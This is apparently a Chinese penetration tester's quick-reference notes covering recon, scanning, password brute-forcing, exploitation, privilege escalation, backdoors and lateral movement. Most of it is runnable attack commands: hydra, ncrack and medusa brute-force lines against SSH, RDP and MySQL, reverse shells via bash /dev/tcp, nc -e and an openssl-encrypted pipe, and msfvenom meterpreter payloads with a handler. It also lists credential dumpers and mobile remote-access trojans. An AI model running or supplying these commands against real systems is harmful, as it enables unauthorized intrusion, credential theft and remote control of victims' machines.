在学习和渗透测试过程中自己写的一些小脚本、小工具和一些常用字典、木马。
本文是渗透测试各阶段工具和快速用法速查笔记,将会持续更新。
Google
Fofa
Shodan
Zoomeye
Goby
whatweb
Github
robtex
ping
#!/bin/bash
for i in {1..255};
do
host=192.168.121.$i
ping -c2 $host >/dev/null
if [ $? = 0 ]
then
echo "192.168.121.$i is connected"
else
echo "192.168.121.$i is not connected"
fi
done
nmap
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oX result.xml
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt
格式化输出存活ip,做后续详细扫描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py
-sS:使用SYN方式扫描,默认用的是-sT方式,即TCP方式,需要完成完整的三次握手,比较费时,SYN就比较快一些了;
-Pn: 禁用PING检测,这样速度快,并且可以防止有些主机无法ping通而被漏掉不扫描;
-n: 禁止DNS反向解析;
–open: 只输出检测状态为open的端口,即开放的端口;
–min-hostgroup 4:调整并行扫描组的大小;
–min-parallelism 1024:调整探测报文的并行度;
–host-timeout 30:检测超时的跳过
-T4:总共有T0-T5,貌似T4比较折中
-v:打印详细扫描过程
-oG:输出为比较人性化的格式,一条记录一行,后期好处理
-iL:载入ip段文件,批量扫,不用一条条执行了。
ipscan
masscan的发包速度非常快,在windows中,它的发包速度可以达到每秒30万包;在Linux中,速度可以达到每秒160万。masscan在扫描时会随机选择目标IP,所以不会对远程的主机造成压力。
https://www.freebuf.com/sectool/112583.html
masscan 172.18.2.1 -p1-65535 --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oL result_mas.txt --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oX result_mas.txt --rate=10000
EmailSniper
SubDominscanner OneForAll https://www.dnsgrep.cn https://securitytrails.com
可参考 http://uuzdaisuki.com/2021/05/31/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E6%80%BB%E7%BB%93/
whatweb -v http://baidu.com
云悉
御剑
Dirbuster
https://www.jianshu.com/p/79c7b1eda56e
webpathbrute
goby
awvs
burpsuite
nessus
xray
hydra
hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh
hydra -V -l admin -P top100.txt 172.18.2.177 rdp
hydra -V -l root -P top100.txt 172.18.2.177 mysql
ncrack
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p mysql -g CL=10,at=3
medusa
medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt
medusa -v 6 -h 172.18.2.177 -u root -P top100.txt -M mysql -t 10 -O out.txt
metasploit
burpsuite
sqlmap
xxer (xml注入利用工具) https://github.com/TheTwitchy/xxer
ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial
Struts2-Scan (struts2历史漏洞扫描和利用) https://github.com/HatBoy/Struts2-Scan
weblogicScanner (weblogic历史漏洞扫描利用) https://github.com/0xn0ne/weblogicScanner
exphub (常见web框架cve利用) https://github.com/zhzyker/exphub
cve,cms,中间件,OA系统漏洞exp合集 https://github.com/mai-lang-chai/Middleware-Vulnerability-detection
免杀webshell三篇总结请见: http://uuzdaisuki.com/2021/05/15/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6asp%E7%AF%87/ http://uuzdaisuki.com/2021/05/12/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6jsp%E7%AF%87/ http://uuzdaisuki.com/2021/05/11/webshell%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6php%E7%AF%87/
由命令执行快速寻找webshell路径并写入请见: http://uuzdaisuki.com/2021/05/20/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%86%99webshell%E6%80%BB%E7%BB%93/
菜刀
蚁剑
冰蝎
哥斯拉
普通反弹shell
bash -i >& /dev/tcp/HOST/PORT 0>&1
加密shell
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.xx.xx:4444 > /tmp/s; rm /tmp/s
nc
攻击机 nc -lvp 4444
靶机 nc -e /bin/bash xx.xx.xx.xx 4444
本地内核提权速查流程 http://uuzdaisuki.com/2021/04/12/windows%E6%8F%90%E6%9D%83%E9%80%9F%E6%9F%A5%E6%B5%81%E7%A8%8B/
各类exp
典型通杀:脏牛CVE-2016-5195
metasploit
cobalt strike
本地漏洞扫描工具:
windows/linux exploit suggester
powerup
accesschk
Sherlock
hash-identifier 判断哈希类型
getpass
pwdump8
Quarks-pwdump
mimikatz
Mimipenguin
Get-PassHashes.ps1
hashcat+口令字典
http://uuzdaisuki.com/2020/07/28/%E5%93%88%E5%B8%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7hashcat/
--hash-type 0 --attack-mode 0
-m选择哈希类型
1000为windows nt hash
-a选择模式
0 Straight(字典破解)
1 Combination(组合破解)
3 Brute-force(掩码暴力破解)
6 Hybrid dict + mask(混合字典+掩码)
7 Hybrid mask + dict(混合掩码+字典)
linuxprivchecker
LinEnum
常见后门手法
metasploit
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
run
常用后续命令
https://www.cnblogs.com/backlion/p/9484949.html
普通shell升级meterpreter http://uuzdaisuki.com/2021/03/12/msf%E6%99%AE%E9%80%9Ashell%E5%8D%87%E7%BA%A7%E6%88%90meterpreter/
cs与msf互相转换 http://uuzdaisuki.com/2021/05/21/msf%E4%B8%8Ecs%E4%BA%92%E7%9B%B8%E8%BD%AC%E6%8D%A2/
python直连反弹shell
http://uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/
其他语言直连反弹shell
linux后门手法总结 http://uuzdaisuki.com/2021/01/05/linux%E5%90%8E%E9%97%A8%E6%89%8B%E6%B3%95%E6%80%BB%E7%BB%93/
windows常见后门手法(这篇几年前写的,后续有时间会出一篇新的较全面的奇淫技巧)
http://uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/
Hydra
nessus
metasploit
nmap
powersploit
Empire
Psnmap
lcx
ew
tunna
proxychains
FRP
N2N
票据传递: http://uuzdaisuki.com/2021/04/21/%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB/
at
schtasks
telnet
sc
wmic
wmiexec.vbs
python impacket wmiexec.py
psexec
远程桌面
Cain
Arpspoof
ettercap
pupy类远控
teamview
pcanywhere
radmin
手机端
DroidJack
Dendroid
SpyNote
ms17-010 基本通杀
cve-2019-0708 开放3389情况 windows7及之前通杀
q-dir 文件管理工具,可开四个窗口
beyond compare 文件/文本比较工具
cmder 命令行工具
everything 文件搜索工具
navicat 数据库连接工具,支持超多种类数据库,支持导出数据,甚至提供拖库的tunnel.php等
悬剑3.0 超齐全windows工具库系统
小米范系列工具 可视化,操作简便 https://www.cnblogs.com/SEC-fsq/tag/%E6%88%91%E7%9A%84%E5%B0%8F%E5%B7%A5%E5%85%B7/